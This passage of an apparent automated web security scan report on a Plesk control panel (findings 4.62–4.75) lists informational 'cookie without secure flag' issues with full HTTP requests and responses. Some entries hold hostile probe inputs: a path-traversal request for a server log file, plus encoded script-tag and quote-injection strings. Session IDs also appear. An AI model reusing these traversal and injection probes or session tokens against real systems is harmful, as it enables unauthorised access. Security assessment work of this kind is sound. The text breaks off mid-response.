Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:39:12 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=home%00fcda7%5C%22%3Bcbb95f53341; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10039

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.62. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/available/id/apscatalog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/login/id/1/pageUrl/app/available/id/apscatalog

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/login/id/1/pageUrl/app/available/id/apscatalog HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:39:32 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=homec8ffe%3C%2Fscript%3Ebfc8c185c3e; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10049

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.63. https://50.22.21.242:8443/admin/update/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/update/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/update/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; psaContext=personal-info; sessionID=lykgulggyjhxxnmnqkvlfkym

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:20:40 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=subscriptions6a50f%2522%253e%253ca%253ece58ca4e6f; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:20:41 GMT
Connection: close
Content-Length: 9722

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.64. https://50.22.21.242:8443/admin/update/settings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/update/settings

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/update/settings HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/server/preferences/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=xvrjftqfoptegfsokqpykqdf; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:02:50 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:02:50 GMT
Connection: close
Content-Length: 20595

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.65. https://50.22.21.242:8443/admin/update/settings/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/update/settings/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/update/settings/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/admin-home
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; psaContext=personal-info; locale=en-US; sessionID=xvrjftqfoptegfsokqpykqdf

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:57:31 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:57:31 GMT
Content-Length: 19705

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.66. https://50.22.21.242:8443/admin/update/settings/e647e%22a%3d%22b%22c3c736922d6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/update/settings/e647e%22a%3d%22b%22c3c736922d6

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/update/settings/e647e%22a%3d%22b%22c3c736922d6 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/?start_page=%2Fadmin%2Fupdate%2Fsettings%2Fe647e%2522a%253d%2522b%2522c3c736922d6
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:36:58 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:36:57 GMT
Content-Length: 11078

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.67. https://50.22.21.242:8443/admin/update/settings/e647e%22a%3d%22b%22c3c736922d649560ed53f10167ff175bf77  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/update/settings/e647e%22a%3d%22b%22c3c736922d649560ed53f10167ff175bf77

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/update/settings/e647e%22a%3d%22b%22c3c736922d649560ed53f10167ff175bf77 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/?start_page=%2Fadmin%2Fupdate%2Fsettings%2Fe647e%2522a%253d%2522b%2522c3c736922d649560ed53f10167ff175bf77
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:39:37 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:39:37 GMT
Content-Length: 11078

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.68. https://50.22.21.242:8443/admin/webmail/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/webmail/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/webmail/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/settings/tools
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:15:27 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:15:26 GMT
Content-Length: 19763

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.69. https://50.22.21.242:8443/admin/webmail/enable  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/webmail/enable

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/webmail/enable HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=deleted

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:49:24 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=health; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:49:25 GMT
Connection: close
Content-Length: 9729

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.70. https://50.22.21.242:8443/filemanager/getimg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /filemanager/getimg.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /filemanager/getimg.php HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:14:05 GMT
Connection: close
Content-Length: 19209

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.71. https://50.22.21.242:8443/get_password.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /get_password.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /get_password.php HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/login_up.php3
Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:33:56 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:33:56 GMT
Connection: close
Content-Length: 4653

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.72. https://50.22.21.242:8443/help.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /help.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help.php?context=../../../../../../../../../../etc/httpd/logs/error.log HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 05:06:49 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=homec8ffe%3C%2Fscript%3Ebfc8c185c3e; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Content-Length: 9037

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.73. https://50.22.21.242:8443/left.php3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /left.php3

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /left.php3 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; psaContext=dashboard; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:53:47 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=personal-info; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:53:47 GMT
Content-Length: 20278

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.74. https://50.22.21.242:8443/login_up.php3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /login_up.php3

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login_up.php3 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: PLESKSESSID=2b487a11e38efdea41e954b30502b2e0; psaContext=dashboard; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:51:41 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Plesk: PSA-Key/PLSK016937440000
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:51:41 GMT
Content-Length: 5081

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.75. https://50.22.21.242:8443/logout.php3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /logout.php3

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /logout.php3 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/admin-home
Cookie: PLESKSESSID=5096b6b7563a9a7b025229ead64eb1da; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:33:17 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
